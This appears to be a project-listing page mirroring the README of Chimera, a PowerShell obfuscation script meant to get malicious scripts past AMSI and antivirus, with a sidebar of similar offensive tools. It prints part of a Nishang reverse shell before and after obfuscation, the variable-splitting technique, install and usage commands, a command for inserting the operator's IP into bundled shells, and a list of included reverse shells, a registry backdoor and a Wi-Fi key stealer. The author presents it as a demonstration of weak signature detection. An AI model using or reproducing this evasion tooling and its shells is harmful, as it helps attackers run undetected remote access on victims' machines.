All Projects → tokyoneon → Chimera

tokyoneon / Chimera

Chimera is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.

Programming Languages

shell
77523 projects
powershell
5483 projects

Projects that are alternatives of or similar to Chimera

Armor
Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners.
Stars: ✭ 228 (-50.76%)
Mutual labels:  kali-linux, penetration-testing, payload, attack, information-security, antivirus, kali, antivirus-evasion
Lscript
The LAZY script will make your life easier, and of course faster.
Stars: ✭ 3,056 (+560.04%)
Mutual labels:  kali-linux, penetration-testing, payload, antivirus-evasion
Rapidpayload
Framework RapidPayload - Metasploit Payload Generator | Crypter FUD AntiVirus Evasion
Stars: ✭ 174 (-62.42%)
Mutual labels:  kali-linux, penetration-testing, antivirus-evasion
Z0172CK-Tools
Hacking Tools Z0172CK
Stars: ✭ 31 (-93.3%)
Mutual labels:  attack, kali-linux, payload
Webkiller
Tool Information Gathering Write By Python.
Stars: ✭ 300 (-35.21%)
Mutual labels:  kali-linux, penetration-testing, kali
Reconnoitre
A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.
Stars: ✭ 1,824 (+293.95%)
Mutual labels:  kali-linux, penetration-testing, offensive-security
Quiver
Quiver is the tool to manage all of your tools for bug bounty hunting and penetration testing.
Stars: ✭ 140 (-69.76%)
Mutual labels:  kali-linux, penetration-testing, kali
Payloadsallthethings
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Stars: ✭ 32,909 (+7007.78%)
Mutual labels:  penetration-testing, payload, payloads
window-rat
The purpose of this tool is to test the window10 defender protection and also other antivirus protection.
Stars: ✭ 59 (-87.26%)
Mutual labels:  antivirus, payload, payloads
Badkarma
network reconnaissance toolkit
Stars: ✭ 353 (-23.76%)
Mutual labels:  kali-linux, penetration-testing, offensive-security
Xxe Injection Payload List
🎯 XML External Entity (XXE) Injection Payload List
Stars: ✭ 304 (-34.34%)
Mutual labels:  payload, information-security, payloads
Msfpc
MSFvenom Payload Creator (MSFPC)
Stars: ✭ 808 (+74.51%)
Mutual labels:  kali-linux, payload, kali
Rapidscan
🆕 The Multi-Tool Web Vulnerability Scanner.
Stars: ✭ 775 (+67.39%)
Mutual labels:  kali-linux, penetration-testing, offensive-security
Vanquish
Vanquish is Kali Linux based Enumeration Orchestrator. Vanquish leverages the opensource enumeration tools on Kali to perform multiple active information gathering phases.
Stars: ✭ 449 (-3.02%)
Mutual labels:  kali-linux, penetration-testing, offensive-security
Buffer overflow
Don't let buffer overflows overflow your mind
Stars: ✭ 131 (-71.71%)
Mutual labels:  penetration-testing, information-security, offensive-security
Payloads
Payload Arsenal for Pentration Tester and Bug Bounty Hunters
Stars: ✭ 421 (-9.07%)
Mutual labels:  penetration-testing, payload, payloads
Winpayloads
Undetectable Windows Payload Generation
Stars: ✭ 1,211 (+161.56%)
Mutual labels:  antivirus, kali, payloads
OSCP-A-Step-Forward
Opening the door, one reverse shell at a time
Stars: ✭ 126 (-72.79%)
Mutual labels:  penetration-testing, kali-linux, offensive-security
anubis
Captive wifi hotspot bypass tool for Linux
Stars: ✭ 46 (-90.06%)
Mutual labels:  penetration-testing, information-security, kali-linux
Webspoilt
This script will you help to find the information about the website and to help in penetrating testing
Stars: ✭ 34 (-92.66%)
Mutual labels:  penetration-testing, kali-linux, kali

Chimera is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.

Chimera was created for this write-up and is further evidence of how trivial it is to bypass detection signatures. Hopefully, this repository will inspire someone to build something robust and more reliable.

How Chimera works...

Below is a snippet of Nishang's Invoke-PowerShellTcp.ps1, found at nishang/Shells. VirusTotal reports 25 detections of the PS1 script.

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}

#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)

#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

And here it is again, after Chimera. VirusTotal reports 0 detections of the obfuscated version.

  # Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.
              $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
       # As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station’s equator, where the thermal port lies hidden.
          [bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
   # Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke’s boyhood friend Biggs, in ship-to-ship combat.

  # Finally, it is up to Luke himself to make a run at the target, and he is saved from Vader at the last minute by Han Solo, who returns in the nick of time and sends Vader spinning away from the station.
           # Heeding Ben’s disembodied voice, Luke switches off his computer and uses the Force to guide his aim.
   # Against all odds, Luke succeeds and destroys the Death Star, dealing a major defeat to the Empire and setting himself on the path to becoming a Jedi Knight.
           $PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
# Far off in a distant galaxy, the starship belonging to Princess Leia, a young member of the Imperial Senate, is intercepted in the course of a secret mission by a massive Imperial Star Destroyer.
            $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
   # An imperial boarding party blasts its way onto the captured vessel, and after a fierce firefight the crew of Leia’s ship is subdued.

Chimera does several things to obfuscate the source. The transformer function will separate strings into multiple pieces and reconstruct them as new variables.

For example, it will take a string like ... New-Object System.Net.Sockets.TCPClient ... and convert it to:

$a = "Syste"
$b = "m.Net.Soc"
$c = "kets.TCP"
$d = "Client"

... New-Object $a$b$c$d ...

The function separates commonly flagged data types and strings into several chunks. It defines the chunks and concatenates them at the top of the script. A higher --level will result in smaller chunks and more variables.

$CNiJfmZzzQrqZzqKqueOBcUVzmkVbllcEqjrbcaYzTMMd = "`m"
$quiyjqGdhQZgYFRdKpDGGyWNlAjvPCxQTTbmFkvTmyB = "t`Rea"
$JKflrRllAqgRlHQIUzOoyOUEqVuVrqqCKdua = "Get`s"
$GdavWoszHwDVJmpYwqEweQsIAz = "ti`ON"
$xcDWTDlvcJfvDZCasdTnWGvMXkRBKOCGEANJpUXDyjPob = "`L`O`Ca"
$zvlOGdEJVsPNBDwfKFWpvFYvlgJXDvIUgTnQ = "`Get`-"
$kvfTogUXUxMfCoxBikPwWgwHrvNOwjoBxxto = "`i"
$tJdNeNXdANBemQKeUjylmlObtYp = "`AsC`i"
$mhtAtRrydLlYBttEnvxuWkAQPTjvtFPwO = "`G"
$PXIuUKzhMNDUYGZKqftvpAiQ = "t`R`iN

Usage

Clone the repository. Tested in Kali v2020.3.

sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help

Basic usage.

./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

Review the usage guide and write-up for more examples and screenshots.

Shells

In the shells/ directory are several Nishang scripts and a few generic ones. All have been tested and should work fine. But there's no telling how untested scripts will reproduce with Chimera...

Change the hardcoded IP addresses.

sed -i 's/192.168.56.101/<YOUR-IP-ADDRESS>/g' shells/*.ps1
ls -laR shells/

shells/:
total 60
-rwxrwx--- 1 tokyoneon tokyoneon 1727 Aug 29 22:02 generic1.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 1433 Aug 29 22:02 generic2.ps1
-rwxrwx--- 1 tokyoneon tokyoneon  734 Aug 29 22:02 generic3.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 4170 Aug 29 22:02 Invoke-PowerShellIcmp.ps1
-rwxrwx--- 1 tokyoneon tokyoneon  281 Aug 29 22:02 Invoke-PowerShellTcpOneLine.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 4404 Aug 29 22:02 Invoke-PowerShellTcp.ps1
-rwxrwx--- 1 tokyoneon tokyoneon  594 Aug 29 22:02 Invoke-PowerShellUdpOneLine.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 5754 Aug 29 22:02 Invoke-PowerShellUdp.ps1
drwxrwx--- 1 tokyoneon tokyoneon 4096 Aug 28 23:27 misc
-rwxrwx--- 1 tokyoneon tokyoneon  616 Aug 29 22:02 powershell_reverse_shell.ps1

shells/misc:
total 36
-rwxrwx--- 1 tokyoneon tokyoneon 1757 Aug 12 19:53 Add-RegBackdoor.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 3648 Aug 12 19:53 Get-Information.ps1
-rwxrwx--- 1 tokyoneon tokyoneon  672 Aug 12 19:53 Get-WLAN-Keys.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 4430 Aug 28 23:31 Invoke-PortScan.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 6762 Aug 29 00:27 Invoke-PoshRatHttp.ps1

Resources

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].